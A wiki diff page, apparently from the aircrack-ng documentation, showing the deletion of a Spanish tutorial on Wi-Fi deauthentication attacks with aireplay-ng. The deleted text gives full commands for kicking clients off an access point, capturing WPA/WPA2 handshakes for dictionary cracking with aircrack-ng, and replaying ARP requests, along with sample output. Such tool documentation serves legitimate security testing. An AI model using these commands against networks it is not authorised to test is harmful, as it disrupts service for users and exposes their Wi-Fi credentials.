User Tools

Site Tools


deautenticacion

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
deautenticacion [2009/08/14 17:22]
mister_x ---
— (current)
Line 1: Line 1:
-====== Deautenticación ====== 
  
-===== Descripción ===== 
-Este ataque envia paquetes de desasociación a uno o más clientes que están actualmente asociados a un punto de acceso.  Las razones por las que es útil desasociar clientes pueden ser: 
- 
-    * Recuperar o desvelar un ESSID oculto.  Este es un ESSID que no es divulgado o anunciado por el AP. 
-    * Capturar handshakes WPA/WPA2 forzando a los clientes a volverse a autenticar 
-    * Generar peticiones ARP (en Windows, algunas veces, los clientes borran su "ARP cache" cuando son desconectados) 
- 
-Por supuesto, este ataque es totalmente inútil si no existen clientes wireless asociados. 
- 
-=====  Uso ===== 
- 
-   aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0 
- 
-Donde: 
-  * -0 significa deautenticación 
-  * 1 es el número de deautenticaciones a enviar (puedes enviar todas las que quieras); 0 significa enviarlas continumente 
-  * -a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso 
-  * -c 00:0F:B5:34:30:30 es la dirección MAC del cliente a deautenticar; si se omite serán deautenticados todos los clientes 
-  *ath0 es el nombre de la interface 
- 
-===== Ejemplos de uso ===== 
- 
-==== Deautenticación típica ==== 
-Primero, es necesario averiguar si hay algún cliente actualmente conectado.  Necesitaremos su dirección MAC para el siguiente comando: 
- 
-aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0 
- 
-Donde: 
-  * -0 significa deautenticación 
-  * 1 es el número de deautenticaciones a enviar (puedes enviar todas las que quieras) 
-  * -a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso 
-  * -c 00:0F:B5:34:30:30 es la dirección MAC del cliente que queremos deautenticar 
-  *ath0 es el nombre de la interface 
- 
-La salida será algo similar a esto: 
- 
-   11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30] 
- 
-==== Captura del Handshake WPA/WPA2  con Atheros ==== 
- 
-  airmon-ng start ath0 
-  airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0  (y abrimos otra consola) 
-  aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0 
-  (esperamos algunos segundos) 
-  aircrack-ng -w /path/to/dictionary out.cap 
- 
-A continuación explicamos estos comandos: 
- 
-airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0\\ 
-Donde: 
-  *-c 6 es el número del canal 
-  *--bssid 00:14:6C:7E:40:80 limita los paquetes capturados únicamente a este punto de acceso 
-  *-w out es el nombre del archivo donde se guardarán las capturas 
-  *ath0 es el nombre de la interface 
- 
-aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0\\ 
-Donde: 
-  *-0 significa ataque de deautenticación 
-  *5 es el número de paquetes de deautenticación a enviar 
-  *-a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso 
-  *-c 00:0F:B5:AB:CB:9D es la dirección MAC del cliente que queremos deautenticar 
-  *ath0 es el nombre de la interface 
- 
-A continuación puedes ver la salida del comando "aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0" 
- 
-   12:55:56  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D] 
-   12:55:56  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D] 
-   12:55:57  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D] 
-   12:55:58  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D] 
-   12:55:58  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D] 
- 
-==== Generar peticiones ARP con una tarjeta Prism2 ==== 
- 
-  airmon-ng start wlan0 
-  airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0  (abrimos otra consola) 
-  aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0 
-  aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0 
- 
-Despues de enviar los 10 paquetes de deautenticación, comenzamos a escuchar para "pescar" algún "ARP requests" con el ataque 3. La opción -h es obligatoria y tiene que ser la dirección MAC de un cliente asociado. 
- 
-Si estás usando el driver [[http://www.linux-wlan.com/linux-wlan|wlan-ng/]], deberías ejecutar el script [[airmon-ng.es|airmon-ng]] (a menos que sepas lo que estás haciendo) o sino la tarjeta no funcionará de forma correcta para poder inyectar. 
- 
-===== Pistas de uso ===== 
- 
-Es más efectivo atacar a un cliente determinado usando la opción -c. 
- 
-Los paquetes de deautenticación son enviados directamente desde el PC a los clientes.  Por lo que se debe comprobar que estamos físicamente cerca de los clientes para que les lleguen los paquetes que enviamos desde nuestra tarjeta wireless. (En [[airodump-ng.es|airodump-ng]] mirar el PWR de los clientes y no el del AP) 
- 
-===== Problemas de uso ===== 
- 
-Ninguno por el momento. 
deautenticacion.1250263347.txt.gz · Last modified: 2009/08/14 17:22 by mister_x